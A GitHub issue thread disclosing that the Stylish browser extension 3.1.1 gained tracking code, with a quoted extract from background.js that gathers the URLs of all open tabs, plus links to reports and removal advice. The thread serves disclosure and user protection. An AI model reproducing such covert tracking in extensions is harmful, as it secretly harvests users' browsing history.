search

stylish-userstyles / stylish

User styles manager for Firefox and other Mozilla software
https://userstyles.org
GNU General Public License v3.0
544 stars 86 forks source link

[WARNING] Stylish 3.1.1 in AMO contains spyware #335

Open Lekensteyn opened 6 years ago

Lekensteyn commented 6 years ago

Hi users of Stylish,

It appears that the Stylish extension (based on the code in this repo) has gained tracking code. Using Rob's excellent CRX Viewer I noticed some fishy code in src/background.js that was loaded on startup and code that was injected in every Google search page. Effects:

  1. The full URL of all open tabs and all pages you visit.
  2. The titles, URLs and of every Google search result

Recommended steps:

  1. Remove the Stylish extension (Firefox should already have disabled the extension)
  2. (Optional:) install https://github.com/openstyles/stylus as replacement

Proof: https://twitter.com/Lekensteyn/status/1014307299475763201 More details: https://robertheaton.com/2018/07/02/stylish-browser-extension-steals-your-internet-history/ https://bugzilla.mozilla.org/show_bug.cgi?id=1472948

Relevant extract for the first issue (src/background.js):

chrome.windows.getAll({
    populate: true
}, function(windows) {
    for (var w = 0; w < windows.length; w++) {
        for (var i = 0; i < windows[w].tabs.length; i++) {
            if (!isRealUrlAddress(windows[w].tabs[i].url)) {
                continue;
            }
            stylesUpdater.updateQueryParams(windows[w].tabs[i].id, {
                reset: true,
                gp: windows[w].tabs[i].url // <-- WTF
            });
            if (windows[w].focused && windows[w].tabs[i].active) {
                stylesUpdater.gpStyleUpdate(windows[w].tabs[i]);
            }
        }
    }
});
333van commented 6 years ago

The news was available in 2017. You can opt-out but I am leaving Stylish and going for Stylus.

Lekensteyn commented 6 years ago

@IAMEVANHE AFAIK that was limited to the Chrome extension, I don't know when the Firefox extension started getting such malicious behavior.

sparskakyl commented 6 years ago

Well, you can modify/remove fishy code to make it not spyware.

Lekensteyn commented 6 years ago

@sparskakyl You are missing the point.

"Vertrouwen komt te voet en vertrekt te paard." [nl] "Once bitten, twice shy"

There is no way I am ever going to use this extension again. Perhaps Stylus, but for now I have replaced the styles that I still use by some Greasemonkey scripts. For example:

// ==UserScript==
// @name      Style: Show Bugzilla attachment ID
// @namespace https://lekensteyn.nl/
// @match     https://bugs.wireshark.org/*
// @version   1
// @grant     none
// ==/UserScript==

((css) => {
  let style = document.createElement("style");
  style.textContent = css;
  document.body.appendChild(style);
})(`
a[href^="#attach_"]:before {
  font-size: medium;
  content: attr(href) ": ";
}
`);
dragetd commented 6 years ago

The original author sold the name and mozilla addon repo access to a data mining company. He was fully aware where this was going and left the users in the dark which did not activaly search for this information.

I blame @JasonBarnabe just as much as this company for this move!